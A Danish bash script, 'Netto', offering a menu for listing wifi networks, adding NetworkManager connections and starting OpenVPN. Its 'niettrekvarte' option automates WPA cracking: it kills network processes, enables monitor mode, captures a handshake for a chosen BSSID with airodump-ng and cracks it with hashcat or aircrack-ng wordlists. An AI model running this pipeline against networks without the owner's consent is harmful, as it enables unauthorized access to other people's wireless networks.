#!/usr/bin/env bash

###
### SKRIPTET MANGLER MULIGHED FOR AT GEMME OPSÆTNING I KONFIGURATIONSFIL FOR AT GÅ I BETA
###


ssidArray=()
ssid=''
wpa=''
autocon=''
conname=''
mon=''
iwconfig=''
ok=''
opt=''
dictpath=''
bssidtocrack=''
bssid=''
hndtryk=''
crackbssid=''
phy_line=$(mktemp)
wifi_dev=$(mktemp)
mondevice=$(mktemp)
ovpnindh=$(mktemp)
vpnmenuselect=$(mktemp)
dev=''
dict=''
dictpath=''
mondev=''
rule=''
valg=''
os="# NETTO - version 0.45a"

	############################################################
	######################## Funktioner ########################
	############################################################


	#################### STARTER MONITORERING ###################
	###########  A N O R M A L E  F U N K T I O N E R ###########	
niettrekvarte(){
	echo "CRACKING AF NETVÆRK KRÆVER IKKE KUN PERSONLIGE TILLADELSER."
	mon="sudo -s airmon-ng"
	$mon  > ${phy_line}
	while read line; do
		for searchdev in $line; do
			if [[ $searchdev = *"wlp"* ]] || [[ $searchdev = *"wlan"* ]];then
				echo "DIT UDSTYR ER:" $searchdev
				dev=$searchdev
				break
			fi
		done
	done<${phy_line}
	rm $phy_line
	rm $wifi_dev
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "#####      S T O P P E R  N E T W O R K M A N A G E R  I  S Y S T E M C T L     #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo ""
	sudo systemctl stop NetworkManager
	clear
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "##### A I R C R A C K - N G  T J E K K E R  O G  D R Æ B E R  P R O C E S S E R #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo ""
	sudo airmon-ng check kill
	clear
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "#####     A I R C R A C K - N G  S T A R T E R  M O N I T O R E R I N G      #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo ""
	sudo airmon-ng start "$dev"
	clear
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "#####      F I N D E R  U D S T Y R E T  T I L  M O N I T O R E R I N G      #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo ""
	ifconfig="ifconfig"
	$ifconfig > ${mondevice}
	while read line; do
		for searchmon in $line; do
			if [[ $searchmon = ${dev+*"mon"*} ]]; then
				echo "DIT MONITORERINGSUDSTYR ER:" ${searchmon//:}
				mondev=${searchmon//:}
				break
			fi
		done
	done<${mondevice}
	crackshake
}	

	##################### FIND PIBE OG GIV HÅNDTRYK ####################
crackshake(){
	getbssid="sudo airodump-ng $mondev"
	clear
	echo "(1/2) SKRIPTET STARTER NU AIRODUMP-NG. DER GENERERES EN LIST AF TILGÆNGELIGE NETVÆRK.   "
	echo "      NÅR DET ØNSKEDE NETVÆRKS BSSID (MAC-ADRESSE) ER FUNDET, TRYKKES q-TASTEN TO GANGE."
	echo "                                                                                        "
	echo "                                                                                        "
	echo "      (!) Når dette tegn vises skal du være ekstra opmærksom. Dette skyldes skriptets   "
	echo "          alpha-tilstand. Vær opmærksom på at, hvis du sendes tilbage hertil er der     "
	echo "          noget, der usædvanligt utilstrækkeligt ved din indtastning.                   "
	echo "                                                                                        "
	echo "                                                                                        "
	read -p "   ENTER/RETURN for at fortsætte...                                                  "
	$getbssid
	echo ""
	read -p "(!) BSSID: " bssid
	read -p "(!) KANAL: " kanal 
	read -p "HÅNDTRYKKETS KALDENAVN (uden filtype og mellemrum): " hndtryk
	if [ -z $bssid ]; then
		fejla="(!)Feltet BSSID kan ikke være tomt"
		crackshake
	elif [ -z $kanal ]; then
		fejlb="(!) Feltet KANAL kan ikke være tomt"
		crackshake
	elif [ -z $hndtryk ]; then
		fejlc="(!) Feltet HÆNDTRYKKETS KALDENAVN kan ikke være tomt"
		crackshake
	elif [[ "$hndtryk" = *"netto"* ]]; then
		fejld="(!) AF PRAKTISKE GRUNDE BEDES DU VÆLGE ET ANDET NAVN."
		crackshake
	fi
	airdump="sudo airodump-ng -c $kanal --bssid $bssid -w $hndtryk wlp4s0mon --ignore-negative-one"
	$airdump
  crackmeth
}

	####################        CRACK SLANGS         ##################
crackmeth(){
	clear
	echo "(2/2) AIRODUMP-NG OVERVÅGER NU FORBINDELSEN OG FORSØGE AT OPFANGE ET HÅNDTRYK.     "
  echo "      ET HÅNDTRYK KAN GENERERES NÅR ET APPARAT FORSØGER AT OPRETTE FORBINDELSE TIL "
	echo "      NETVÆRKET. HVIS DU BLIVER TRÆT AF AT VENTE, KAN DU FORSØGE AT GENNEMTVINGE ET"
	echo "      HÅNDTRYK, VED SELV AT FORSØGE AT OPRETTE FORBINDELSE TIL NETVÆRKET.          "
	echo "      HVIS DER GENERERES ET HÅNDTRYK, VISES DETTE I ØVERSTE HØJRE HJØRNE.          "
	echo "                                                                                   "
	echo "      TRYK TO GANGE PÅ q-TASTEN NÅR ET HÅNDTRYK MELDES FUNDET.                     "
	echo "                                                                                   "
	echo "      (!) HVILKEN METODE VIL DU BRUGE TIL AT CRACKE FORBINDELSEN NÅR HÅNDTRYKKET ER"
	echo "          GENERERET?                                                               "
	echo "                                                                                   "
	echo "          <h1> HASHCAT CRACKING MED ORDBOG, MEN UDEN REGELSÆT (HURTIG)             "
	echo "               Denne metode anbefales ved brug af god WPA-ordbog.                  "
	echo "                                                                                   "
	echo "          <h2> HASHCAT CRACKING MED ORDBOG MED REGELSÆT (MULIGVIS MEGET LANGSOM)   "
	echo "               Denne metode anbefales ikke til brug af WPA cracking. Men hvis du   "
	echo "               ved hvad du laver og har visse info om sikkerhedskoden kan denne    "
	echo "               metode være nyttig. Opsætning af ordbog og regel er muligvis        " 
	echo "               nødvendig.                                                          "
	echo "                                                                                   "
	echo "          <ac> AIRCRACK CRACKING MED ORDBOG; MEN UDEN REGELSÆT (LANGSOM)           "
	echo "               Denne metode langsommere end h1, men kan være nyttig, hvis Hashcat  "
	echo "               ikke er installeret (af en eller anden mystisk årsag).              "
	echo ""
	read -p "KOMMANDO (fx. xx) " ab
	maccrack
}

maccrack(){
	if [ "$ab" == "h2" ]; then
		meth="h2"
		crackdict
		elif [ "$ab" == "h1" ]; then
			meth="h1"
			crackdict
		elif [ "$ab" == "ac" ]; then
			meth="ac"
			crackdict
	else	
		crackmeth
	fi
}

	#################### VÆLG ORDBOG ######################

crackdict(){	
	clear
	echo "VÆLG EN AF DINE ORDBØGER:"
	echo ""
	ls -f ${HOME}/dicts
	echo ""
	read -p "(!) SKRIV ORDBOGENS FILNAVN (${HOME}/dicts/) " dictfile
	dictpath="${HOME}/dicts/${dictfile}"
	if [[ -f "$dictpath" ]]; then
	  rm $mondevice
		paybill
	else
		crackdict
	fi
}

	########## SLÅ INTERNET TIL IGEN ################
paybill(){
	clear
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "#####                 S T O P P E R  M O N I T O R E R I N G                 #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo ""
	echo "> MONITORERING STOPPES PÅ $mondev"
	sudo airmon-ng stop "$mondev"
	clear
	echo ""
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "#####  N E T W O R K M A N A G E R  A K T I V E R E S  I  S Y S T E M C T L  #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo 
	sudo systemctl start NetworkManager
	clear
	if [ "$meth" = "h1" ]; then
		hcnorule
	elif [ "$meth" = "h2" ]; then
		hcrule
	elif [ "$meth" = "ac" ]; then
		aircrack
	fi
}

	#################### CRACK MED HASHCAT ###################
hcrule(){
	clear
	echo "VÆLG EN AF DINE REGEL LISTER (*.rule):"
	echo
	ls -f ${HOME}/rules
	echo
	read -p "INDTAST REGELSÆTTETS FILNAVN (${HOME}/rules/) " rulefile
	rule="${HOME}/rules/${rulefile}" 
	if [[ -f "$rule" ]]; then
		rulecrack
	else
		hcrule
	fi
}

rulecrack(){
  wpaclean="wpaclean ${hndtryk}.cap ${hndtryk}-01.cap"
  $wpaclean
  crack="sudo aircrack-ng -j $hndtryk ${hndtryk}.cap"
  $crack
  hashcat="sudo hashcat -m 2500 -r $rule ${hndtryk}.hccapx $dictpath -D 1,2 --force"
  $hashcat
	echo
	echo "(!) VÆR OPMÆRKSOM PÅ HVILKE FILER DU SLETTER"
	echo
  rm ${hndtryk}*.*
	echo
	read -p "ENTER/RETUR FOR MENU "
	menu
}

hcnorule(){
	clear
  wpaclean="wpaclean ${hndtryk}.cap ${hndtryk}-01.cap"
  $wpaclean
  crack="sudo aircrack-ng -j $hndtryk ${hndtryk}.cap"
  $crack
  hashcat="sudo hashcat -m 2500 -a 0 ${hndtryk}.hccapx $dictpath -D 1,2 --force"
  $hashcat
	echo
	echo "(!) VÆR OPMÆRKSOM PÅ HVILKE FILER DU SLETTER"
	echo
  rm ${hndtryk}*.*
	echo
  read -p "ENTER/RETUR FOR MENU "
	menu
}

	#################### CRACK MED AIRCRACK-NG #################
aircrack(){
	clear
  crack="sudo aircrack-ng -w $dictpath -b $bssid ${hndtryk}-01.cap"
  $crack
	echo
	echo "(!) VÆR OPMÆRKSOM PÅ HVILKE FILER DU SLETTER"
	echo
  rm ${hndtryk}*.*
	read -p "ENTER/RETUR FOR MENU "
	menu
}

	     ################################################
	################### NORMALE NETVÆRKSFUNKTIONER ############
udkig(){
	clear
	echo $os
	echo "FIND FORBINDELSER"
  echo
	nmcli -f IN-USE,SSID,FREQ,BARS,SIGNAL,SECURITY,ACTIVE,CHAN dev wifi
  echo
	read -p "ENTER/RETUR FOR MENU "
	menu
       	
}

opstartsforb(){

	clear
	echo $os
  echo "OPRET NY AUTOMATISK FORBINDELSE"
	echo 
#	nmcli -f IN-USE,SSID,FREQ,BARS,SIGNAL,SECURITY,ACTIVE,CHAN dev wifi
#	echo
#  read -p "SSID " ssid
#	read -p "ADGANGSKODE " wpa
#	read -p "KALDENAVN " conname
#	nmcli d wifi c "$ssid" password "$wpa"
#	nmcli c add type wifi ssid "$ssid" connection.autoconnect yes con-name "$conname"
#	echo 
#	read -p "ENTER/RETUR FOR MENU "
#udkig(){

i=0
  nmcli -f SSID,BARS,SIGNAL,ACTIVE -m multiline d w | { while read line; do
     for ssid in $line; do
        if [[ "$ssid" =~ "SSID:"* ]]; then
          ssid=$(echo $line | sed 's/SSID: //g')
 #        echo $ssid
          i=$((i+1))
          echo "$i: $ssid"
          array+=("${ssid}")
        fi
      done
      echo $line
    done
    echo
    read -p "VÆLG FORBINDELSE (1-$i) " input </dev/tty
 #echo ${array[((input-1))]}
 ssid=${array[((input-1))]}
 #echo "VALGTE: $ssid"
 read -p "ADGANGSKODE TIL $ssid " wpa </dev/tty
 read -p "FORBINDELSENS KALDENAVN " conname </dev/tty
 nmcli c add type wifi ssid "$ssid" connection.autoconnect yes con-name "$conname"
}
  echo
  read -p "ENTER/RETUR FOR MENU "
	menu
}

midlforb(){
  clear
	echo $os
  echo "OPRET NY MIDLERTIDIG FORBINDELSE TIL ET NETWÆRK" 
  echo
#  nmcli -f SSID,FREQ,BARS,SIGNAL,SECURITY,ACTIVE dev wifi 
	#nmcli -f SSID,FREQ,BARS,SIGNAL,SECURITY,ACTIVE dev wifi | awk '/WPA*/{print NR-1 ": " $0}'
#  read -p "SSID " ssid
#	read -p "ADGANGSKODE " wpa
#	nmcli d wifi c "$ssid" password "$wpa"
#	echo
#	read -p "ENTER/RETUR FOR MENU "
  
i=0
  nmcli -f SSID,BARS,SIGNAL,ACTIVE -m multiline d w | { while read line; do
     for ssid in $line; do
        if [[ "$ssid" =~ "SSID:"* ]]; then
          ssid=$(echo $line | sed 's/SSID: //g')
 #        echo $ssid
          i=$((i+1))
          echo "$i: $ssid"
          array+=("${ssid}")
        fi
      done
      echo $line
    done
    echo
    read -p "VÆLG FORBINDELSE (1-$i) " input </dev/tty
 #echo ${array[((input-1))]}
 ssid=${array[((input-1))]}
 #echo "VALGTE: $ssid"
 read -p "ADGANGSKODE TIL $ssid " wpa </dev/tty
 nmcli d wifi c "$ssid" password "$wpa"
}
	echo
	read -p "ENTER/RETUR FOR MENU "
	menu
}

# Mangler mulighed for at oprette passwordtxt
# Mangler funktion der tjekker om der er forbindelse til internettet.

openvpn(){
	clear
	echo $os
	echo "FORBIND TIL ET VIRTUELT PRIVAT NETVÆRK"
  echo
	echo "VÆLG TEKSTFILEN INDEHOLDENDE BRUGERNAVN OG ADGANGSKODE:"
	echo
	ls -f /etc/openvpn/*.txt
	echo
	read -p "SKRIV FILENS NAVN " pass
	passpath="/etc/openvpn/${pass}"
	echo $passpath
	if [[ -f "$passpath" ]]; then
		vpnstart
	else
		openvpn
	fi
}

vpnstart(){
	clear
	echo $os
  echo "FORBIND TIL ET VIRTUELT PRIVAT NETVÆRK"
	echo
	echo "VÆLG EN AF DINE OPENVPN KONFIGURATIONSFILER (*.ovpn ELLER *.conf):"
	echo
	count=0
	cmdovpn="ls -f /etc/openvpn/*.ovpn"
	cmdconf="ls -f /etc/openvpn/*.conf"
	
# Skriver output med indhold til tempfil

    $cmdovpn>${ovpnindh}
		$cmdconf>>${ovpnindh}
	
# Skanner indholdet af tempfil og laver ny med 1=*,2=*...

  while read index;
		do
		for ovpnfiler in $index; do
			((count++))
			echo "<${count}>${ovpnfiler}" >> ${vpnmenuselect}
		done
	done<${ovpnindh}
	
# Opstiller menuen

  cat $vpnmenuselect
	echo
	echo "(!) NÅR FORBINDELSEN ER OPRETTET AFBRYDES FORBINDELSEN VED AT TRYKKE CTRL-C"
	echo
	read -p "SKRIV NUMMERET FØR STIGEN TIL FILEN " vpnvalg
	
# Skanner den nye tempfil for brugerens input

  while read line;
	do
		for valg in $line
		do
			if [[ "${valg}" = "<${vpnvalg}>"* ]]; then
				# Info starter efter lighedstegnet				
			       	valgtvpn=${valg#*>}
		fi
		done
	done<${vpnmenuselect}
	rm $ovpnindh
	rm $vpnmenuselect

# Gør kommandoen til start af vpn forbindelse klar

  echo
	echo "DER KRÆVES SUPERBRUGER TILLADELSE"
	echo
	# Starter vpn forbindelse
	sudo killall openvpn
	echo "> SØRGER FOR AT DER IKKE KØRER NOGLE OPENVPN PROCESSER"
	echo
	echo "#####MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM#####"
	echo "#####  F O R S Ø G E R  A T  S T A R T E  V P N - F O B I N D E L S E  #####"
	echo "^^WWWWWWWWWWWWWWVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVWWWWWWWWWWWWWW^^"
	echo
	cd /etc/openvpn
	sudo openvpn --config "$valgtvpn" --auth-user-pass "$passpath" --setenv PATH '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin' --script-security 2 --up /etc/openvpn/scripts/update-systemd-resolved --down /etc/openvpn/scripts/update-systemd-resolved --down-pre
	echo
	read -p "ENTER/RETUR FOR MENU "
	count=0
	menu
}

fjernforb(){
	clear
	echo $os
  echo "FJERN FORBINDELSE"
	echo
	nmcli -p -m multiline -f NAME,AUTOCONNECT,AUTOCONNECT-PRIORITY c s 
	read -p "NAVNET PÅ FORBINDELSEN TIL FJERNELSE " conname
	nmcli c delete "$conname"
	echo
	read -p "ENTER/RETUR FOR MENU "
	menu
}

viskonf(){
	clear
	echo $os
  echo "ALLEREDE KONFIGUREREDE FORBINDELSER"
	echo
	nmcli -p -m multiline -f NAME,AUTOCONNECT,AUTOCONNECT-PRIORITY c s
	echo
	read -p "ENTER/RETUR FOR MENU "
	menu
}

wifi_radio(){
  clear
  echo $os
  echo "TÆND ELLER SLUK WIFI"
  echo
  #Tjek om wifi er tændt eller slukket og giv modsat valg.
  read -p "ON/OFF" on_off
}


om(){
	clear
	echo $os
  echo "OM"
	echo
	echo "<> INFO OG OG BETINGELSER FOR BRUG"
	echo
	echo "  ~ GENEREL INFO OG BETINGELSER FOR BRUG"
	echo
	echo "  (!) Dette tegn betyder at du skal være særlig opmærksom på at"
	echo "      fodre skriptet med den korrekte info. Hvis den korrekte"
	echo "      info ikke gives, kan det have konsekvenser for skriptets"
	echo "      funktionalitet. DETTE SKRIPT ER STADIG I ALPHA TILSTAND"
	echo "      og derfor ikke helt færdigskrevet."
	echo
	echo " ~ OM NETTO OG BETINGELSER FOR BRUG"
	echo
	echo "    Netto er et bash-skript skrevet i sommeren 2020 i forbindelse"
	echo "    med en Arch Linux installation. Formålet er at give migselv"
	echo "    (tak skal du have) adgang til internettet. Skulle du af den"
	echo "    ene, eller den anden årsag være kommet i besiddelse af skriptet,"
	echo "    er al brug på eget ansvar. Jeg kan ikke stilles til regnskab for"
	echo "    din brug af dette skript. Jeg fralægger mig alt ansvar for skade"
  echo "    eller krænkelse som skriptet måtte forvolde dit eller andres"
	echo "    computersystem, netværk eller privatliv. Dette skript indeholder"
	echo "    open source software der er tiltænkt til sikkerhedsvurdering af"
	echo "    netværk. Du bør altid sikre samtykke før disse software benyttes"
	echo "    på fremmede netværk."
	echo
	echo "<> INSTALLATION"
	echo
	echo "    (!) ALPHA: DER ER STADIG MEGET AT GØRE."
	echo
	echo "  ~ VEDRØRENDE GENERELLE NETVÆRKSFORBINDELSER"
	echo
	echo "   - PAKKER OG OPSÆTNING"
	echo "     NØDVENDIGE FOR BASALE NETVÆRKSFUNKTIONER"
	echo
	echo "   1. networkmanager ( nmcli )"
	echo
	echo "   2. openvpn"
	echo "   3. openresolv"
	echo "   4. openvpn-update-systemd-openresolv"
	echo "       Du har også brug for /etc/openvpn/client/client.conf"
	echo "       Indeholdende:"
	echo " ______                                              _____"
	echo "|1|	client                                              |" 
	echo "|2|	remote example.com 1194 udp                         |"
	echo "|3|	.."
	echo "|4|	script-security 2"
	echo "|5|	setenv PATH /usr/bin"
	echo "|6|	up /etc/openvpn/scripts/update-systemd-resolved"
	echo "|7|	down /etc/openvpn/scripts/update-systemd-resolved"
	echo "|8|	down-pre"
	echo "|9|	dhcp-option DOMAIN-ROUTE"
	echo "|_|___                        __            _____"
	echo
	echo "       OPENVPN KONF.-FILER (*.ovpn ELLER *.conf) PLACERES I:" 
	echo "          /etc/openvpn/"
	echo
	echo "       DET SAMME GÆLDER *.txt INDEHOLDENDE BRUGER OG ADGANGSKODE:"
	echo "                                                ______________________"
	echo "       Følgende format understøttes af OpenVPN:|1|oIJOBRiuGERsF7NAVN0   "
	echo "       E   K   S   E   M   P   E   L           |2|djoiADGJA97NGasKodE   |"
	echo "                                               |_|       _____        __|"
	echo "       Første linie er bruger og anden linie er adgangskoden . . ."
	echo
	echo "  - PAKKER OG OPSÆTNING"
	echo "    NØDVENDIGE FOR NETVÆRKSFUNTIONER VEDR. LÅSTE FORBINDELSER"
	echo
	echo "  ~ NØDVENDIGE PAKKER:"
	echo "    5. aircrack-ng og/eller hashcat"
	echo "    6. <AIRCRACK/HASHCAT> ifconfig"
	echo "    7. <AIRCRACK/HASHCAT> usbutils: lsusb"
	echo "    8. <HASHCAT> intel-compute-runtime (OpenCL driver)"
	echo "       non-intel systemer bruger: AMD opencl driver, NVIDIA opencl driver"
	echo "    9. <HASHCAT> opencl-headers"
	echo
	echo "    REGELLISTER I MAPPEN: /home/*BRUGER*/rules/"
	echo "    ORDBØGER I MAPPEN: /home/*BRUGER*/dicts/"
	echo
	read -p "ENTER/RETUR FOR MENU "
	menu
}

help(){
  echo "FØLGENDE ARGUMENTER KAN BRUGES FRA KOMMANDO PROMT"
  echo "FOR@EKSEMPEL [~] $ netto vpn"
	echo "<f>             : VIS FORBINDELSER"
	echo "<a>             : OPRET AUTOMATISK NETVÆRKSFORBINDELSE"
	echo "<c>             : FORBIND TIL NETVÆRK"
	echo "<vpn>           : FORBIND VIA OPENVPN KONFIGURATION"
	echo "<d>             : SLET KONFIGURERET NETVÆRKSFORBINDELSE"
	echo "<conf>          : VIS KONFIGUREREDE NETVÆRSKFORBINDELSER"
	echo "<niettrekvarte> : FORSØG AT BRYDE LÅST NETVÆRKSFORBINDELSE"
  echo "<help>          : HJÆLP"
	echo "<about>         : OM SKRIPTET, LÆS FØR BRUG"
	echo
	read -p "ENTER/RETUR FOR MENU "
	menu
}
  

menu(){
while :
	do
	clear
	echo $os
	echo
	echo "<f> ........... VIS FORBINDELSER"
	echo "<a> ........... OPRET AUTOMATISK NETVÆRKSFORBINDELSE"
	echo "<c> ........... FORBIND TIL NETVÆRK"
	echo "<vpn> ......... FORBIND VIA OPENVPN KONFIGURATION"
	echo "<d> ........... SLET KONFIGURERET NETVÆRKSFORBINDELSE"
	echo "<conf> ........ VIS KONFIGUREREDE NETVÆRSKFORBINDELSER"
	echo "<niettrekvarte> FORSØG AT BRYDE LÅST NETVÆRKSFORBINDELSE"
	echo "<q> ........... AFSLUT"
	echo
  echo "<help> ........ HJÆLP"
	echo "<about> ... (!) OM SKRIPTET, LÆS FØR BRUG"
	echo
	if [ ! -z "$menuflag" ]; then
		echo
		echo "(!)"
		echo $menuflag
		echo
	fi
	read -p "KOMMANDO " opt	
		case $opt in
		[f] | [F]) 
			udkig
			clear
			echo $os
			echo
			;;
		"a" | "A")
			opstartsforb
			clear
	 		echo $os
			echo
			;;
		[c] | [C])
			midlforb
			clear
			echo $os
			echo
			;;
		"vpn" | "Vpn" | "VPN")
			openvpn
			clear
			echo $os
			echo
			;;
		[d] | [D])
			fjernforb
			clear
			echo $os
			echo
			;;
		"conf" | "CONF" | "Conf")
			viskonf
			clear
			echo $os
			echo
			;;
		"about" | "ABOUT" | "About")
			om
			clear
			echo $os
			echo
			;;
		"niettrekvarte" | "NIETTREKVARTE" | "Niettrekvarte")
			niettrekvarte
			clear
			echo $os
			echo
			;;
    "help" | "HELP" | "Help")
      clear 
      help
      echo $os
      echo
      ;;
		[q] | [Q])
			exit 0		
			;;
		*)
			menuflag="KOMMANDOEN BLEV IKKE GENKENDT."
			clear
			echo $os
			echo
		esac
	done
	
}

	######################################
	#### *  PROGRAMMER STARTER HER * #####
       ##### TAG IMOD ARGUMENT? #####

if [ "$1" == "vpn" ]; then
  openvpn
elif [ "$1" == "f" ]; then
  udkig
elif [ "$1" == "a" ]; then
  opstartsforb
elif [ "$1" == "c" ]; then
  midlforb
elif [ "$1" == "d" ]; then
  fjernforb
elif [ "$1" == "conf" ]; then
  viskonf
elif [ "$1" == "about" ]; then
  om
elif [ "$1" == "niettrekvarte" ]; then
 niettrekvarte 
fi

	################# MENU ###############

menu

exit 0
